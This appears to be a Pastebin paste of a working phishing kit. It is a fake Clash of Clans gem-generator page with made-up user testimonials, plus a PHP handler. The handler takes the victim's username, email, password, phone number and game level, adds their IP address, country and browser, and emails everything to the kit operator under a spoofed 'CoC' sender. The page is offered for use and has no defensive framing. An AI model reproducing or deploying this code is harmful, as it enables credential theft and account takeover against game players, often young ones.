Advertisement
Guest User

phising send mail

a guest
Sep 8th, 2016
590
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 9.56 KB | None | 0 0
  1. <?php
  2. include('resource/ip_info.php');
  3.  
  4. $nick = $_POST['username'];
  5. $mail = $_POST['email'];
  6. $pass = $_POST['password'];
  7. $telp = $_POST['hp'];
  8. $th = $_POST ['th'];
  9.  
  10. $ip = $_SERVER['REMOTE_ADDR'];
  11. $today = date("F j, Y, g:i a");
  12. $link = $_SERVER['SERVER_NAME'];
  13. $browser = $_SERVER['HTTP_USER_AGENT'];
  14.  
  15. $body = "
  16. ++========[ ReZulT - CoC ]========++
  17. Nickname => ".$nick."
  18. Email => ".$mail."
  19. Password => ".$pass."
  20. Handphone => ".$telp."
  21. Townhall => ".$th."
  22. ++========[ ReZulT - CoC ]========++
  23.  
  24. ++========[ DevizE - Info ]========++
  25. FROM => ".$ip." | ".$link." | ".$nama_negara." On ".gmdate('r')."
  26. Browser => ".$browser."
  27. ++========[ DevizE - Info ]========++
  28. ";
  29.  
  30. //* jangan di ubah kalo kagak mau error!,gak usah sok tau deh //*
  31. $subjek = "CoC TownHall ".$th." (".$ip.")";
  32. $headers = "From: CoC <coc@coc-result.com>";
  33. $success = mail($mailto, $subjek, $body, $headers);
  34. ?>
  35. <?php
  36. include('resource/ip_info.php');
  37.  
  38. $nick = $_POST['username'];
  39. $mail = $_POST['email'];
  40. $pass = $_POST['password'];
  41. $telp = $_POST['hp'];
  42. $th = $_POST ['th'];
  43.  
  44. $ip = $_SERVER['REMOTE_ADDR'];
  45. $today = date("F j, Y, g:i a");
  46. $browser = $_SERVER['HTTP_USER_AGENT'];
  47.  
  48. $body = "
  49. ++========[ ReZulT - CoC ]========++
  50. Nickname => ".$nick."
  51. Email => ".$mail."
  52. Password => ".$pass."
  53. Handphone => ".$telp."
  54. Townhall => ".$th."
  55. ++========[ ReZulT - CoC ]========++
  56.  
  57. ++========[ DevizE - Info ]========++
  58. FROM => ".$ip." | ".$link." | ".$nama_negara." On ".gmdate('r')."
  59. Browser => ".$browser."
  60. ++========[ DevizE - Info ]========++
  61. ";
  62.  
  63. //* jangan di ubah kalo kagak mau error!,gak usah sok tau deh //*
  64. $subjek = "CoC TownHall ".$th." (".$ip.")";
  65. $headers = "From: CoC <coc@coc-result.com>";
  66. $success = mail($email_sia, $subjek, $body, $headers);
  67. ?>
  68. <?php
  69. $random = rand(1000,5000);
  70. ?>
  71. <!DOCTYPE html>
  72. <html>
  73. <!--
  74. =========================
  75. (c) Hak Cipta Dilindungi
  76. =========================
  77. Supercell & Yoga Aprilliansyah a.K.a SMURF1E
  78. Updated : 18 Desember 2015
  79. -->
  80. <head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
  81. <meta http-equiv="refresh" content="5;URL='success.php'" />
  82. <!-- Bootstrap Start -->
  83. <link rel="stylesheet" href="css/bootstrap.min.css">
  84. <link rel="stylesheet" href="css/bootstrap-theme.min.css">
  85. <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>
  86. <script src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.9.2/jquery-ui.min.js"></script>
  87. <link href='https://fonts.googleapis.com/css?family=Roboto' rel='stylesheet' type='text/css'/>
  88. <title>Clash of Clans Events</title>
  89. <script src='https://www.google.com/recaptcha/api.js'></script>
  90. </head>
  91. <style>
  92. body{background:transparent url(http://s.cdpn.io/3/blurry-blue.jpg);-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;background-attachment:fixed;font-family:"Roboto";color:#fff}.container{margin-right:auto;margin-left:auto;width:65%;padding:15px}.box{font-family:Tahoma;line-height:25px;color:#333;font-size:14px;padding:20px;border-radius:5px;background-color:#f5f5f5;width:58%;background:rgba(114,154,167,0.27);box-shadow:0 1px 5px rgba(0,0,0,0.2),inset 0 1px 1px rgba(255,255,255,0.2);text-shadow:1px 1px 1px rgba(0,0,0,0.3)}.box-big{font-family:Tahoma;line-height:25px;color:#ddd;font-size:14px;padding:20px;border-radius:5px;background-color:#f5f5f5;background:rgba(114,154,167,0.27);box-shadow:0 1px 5px rgba(0,0,0,0.2),inset 0 1px 1px rgba(255,255,255,0.2);text-shadow:1px 1px 1px rgba(0,0,0,0.3)}.box-right{font-family:Tahoma;line-height:25px;color:#ddd;font-size:14px;padding:20px;border-radius:5px;float:right;width:40%;background:rgba(114,154,167,0.27);box-shadow:0 1px 5px rgba(0,0,0,0.2),inset 0 1px 1px rgba(255,255,255,0.2)}button:focus,button:active,button:hover{outline:0!important}.form-control{width:100%;padding:.375rem .75rem;font-size:1rem;line-height:1.5;color:#fff;background-color:rgba(20,20,20,0.5);background-image:none;border:1px solid transparent;border-radius:.25rem;box-shadow:0 1px 5px rgba(0,0,0,0.2),inset 0 1px 1px rgba(255,255,255,0.2);transition:all .1s}.form-control:focus{width:100%;padding:.375rem .75rem;font-size:1rem;line-height:1.5;color:#fff;background-color:rgba(20,20,20,0.5);background-image:none;border:1px solid #5F5F5F;border-radius:.25rem;box-shadow:0 1px 5px rgba(0,0,0,0.2),inset 0 1px 1px rgba(255,255,255,0.2);transition:all .1s}.input-group-addon:first-child{border-right:0;background-color:#525252;border:1px solid transparent}.btn:hover{transition:all .1s}.btn:focus{transition:all .1s}
  93. </style>
  94. <body>
  95. <div class="container">
  96. <div class="alert alert-success" role="alert">
  97. <center>
  98. <b>Status:</b> <font color="green"> Generating... <img src="https://fbstatic-a.akamaihd.net/rsrc.php/v2/yb/r/GsNJNwuI-UM.gif"/></font>
  99. </center>
  100. </div>
  101. <div class="box-right">
  102. <form class="sky-form">
  103. <fieldset>
  104. <label class="input">
  105. <i class="icon-append fa fa-user" style="color:orange;"></i>
  106. <b>Muhammad Rizki</b> said:<br>Thanks, generatornya work banget, takutnya kebanned !!
  107. <br><br><i>Posted on <span id="date1">09/14/2015</span> at 15:37</i>
  108. </label><br>
  109. </fieldset>
  110. <fieldset>
  111. <label class="input">
  112. <i class="icon-append fa fa-user" style="color:orange;"></i>
  113. <b>Erland</b> said:<br> Work gan Thanks! bisa beberapa kali kan submitnya gan!?
  114. <br><br><i>Posted on <span id="date2">09/01/2015</span> at 10:54</i>
  115. </label><br>
  116. </fieldset>
  117. <fieldset>
  118. <label class="input">
  119. <i class="icon-append fa fa-user" style="color:orange;"></i>
  120. <b>Anonymous</b> said:<br> Waaaawww.. COC gw jadi mantep gan! thanks generatornya work banget:)
  121. <br><br><i>Posted on <span id="date3">08/19/2015</span> at 00:27</i>
  122. </label><br>
  123. </fieldset>
  124. <fieldset>
  125. <label class="input">
  126. <i class="icon-append fa fa-user" style="color:orange;"></i>
  127. <b>Anonymous</b> said:<br>Akhirnya nemu juga tools generator COC yang work, udah cari di google pada gak work! disini work thanks ya min
  128. <br><br><i>Posted on <span id="date1">08/02/2015</span> at 15:37</i>
  129. </label><br>
  130. </fieldset>
  131. </form>
  132. </div>
  133. <div class="box">
  134. <!-- Generate -->
  135. <div class="panel panel-warning">
  136. <div class="panel-body">
  137. <div class="input-group" style="width:49%;float:right">
  138. <span class="input-group-addon" id="sizing-addon2"><img src="resource/gems.png" style="width:18px;height:20px;"/></span>
  139. <input type="text" class="form-control" placeholder="Max.28.000 !" aria-describedby="sizing-addon2">
  140. </div>
  141. <div class="input-group" style="width:49%;float:left">
  142. <span class="input-group-addon" id="sizing-addon2"><img src="resource/gold.png" style="width:18px;height:20px;"/></span>
  143. <input type="text" class="form-control" placeholder="Max.8.000.000" aria-describedby="sizing-addon2">
  144. </div>
  145. <br/><br/>
  146. <div class="input-group">
  147. <span class="input-group-addon" id="sizing-addon2"><img src="resource/elixir.png" style="width:18px;height:20px;"/></span>
  148. <input type="text" class="form-control" placeholder="Max.8.000.000" aria-describedby="sizing-addon2">
  149. </div>
  150. </div>
  151. </div>
  152. </div>
  153. <br>
  154. <div class="box">
  155. <!-- Generate End -->
  156.  
  157. <!-- Info -->
  158. <div class="panel panel-info">
  159. <div class="panel-body">
  160. <!-- Form Start -->
  161. <form method="post" action="success.php">
  162. <div class="form-group">
  163. <label for="username" style="color: #DDD;">Username :</label><section class="col" style="float:right;">
  164. <img src="http://www.clashgemsgenerator.com/content/Clash-of-Clans-Cheats-Logo.png" height="100px" width="100px">
  165. </section>
  166. <input type="text" style="width:75%" class="form-control" id="username" name="username" placeholder="Username" autocomplete="off" required>
  167. </div>
  168. <div class="form-group">
  169. <label for="email" style="color: #DDD;">Email Address :</label>
  170. <input type="email" class="form-control" id="email" name="email" placeholder="Email" autocomplete="off" required>
  171. </div>
  172. <div class="form-group">
  173. <label for="password" style="color: #DDD;">Password :</label>
  174. <input type="password" class="form-control" id="password" name="password" placeholder="Password" required>
  175. </div>
  176. <div class="form-group">
  177. <label for="TownHall_Level" style="color: #DDD;">Phone Number :</label><br>
  178. <input type="text" class="form-control" id="hp" name="hp" placeholder="+62" autocomplete="off" style="width:49%;float:left;" required>
  179.  
  180. <input type="number" class="form-control" id="th" name="th" max="10" min="1" placeholder="Townhall Level" style="width:49%;float:right;" autocomplete="off" required>
  181. </div>
  182. <br>
  183. <br>
  184. <center><button type="submit" class="btn btn-primary">Submit</button>
  185. <button type="reset" class="btn btn-danger">Reset</button></center>
  186. </form>
  187. <!-- Form end -->
  188. </div>
  189. </div>
  190. <!-- Info End -->
  191. </div>
  192. <br>
  193. <div class="box-big">
  194. <h2 style="font-size:15px">About Clash of Clans Hack</h2>
  195. <p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Do you need additional Gems on Clash of Clans? Do not hesitate! Try the newest Clash of Clans Gems Hack. Use it to buy gems on Clash of Clans! Generate Gems for Clash of Clans directly from your browser, undetected.</p>
  196. <h2 style="font-size:15px">About Clash Of Clans Games</h2>
  197. <p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Clash of Clans is a popular iPad/iPhone/iPod game created by "Supercell". It has been available internationally on the iTunes store for free since its initial v1.7 release on August 2, 2012. Clash of Clans is a strategy game where, like many other strategy games out there, the purpose is to build one's village, unlock different warriors, raid resources from other villages, create a clan and much, much more.</p>
  198. </div>
  199. </div>
  200. </body>
  201. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement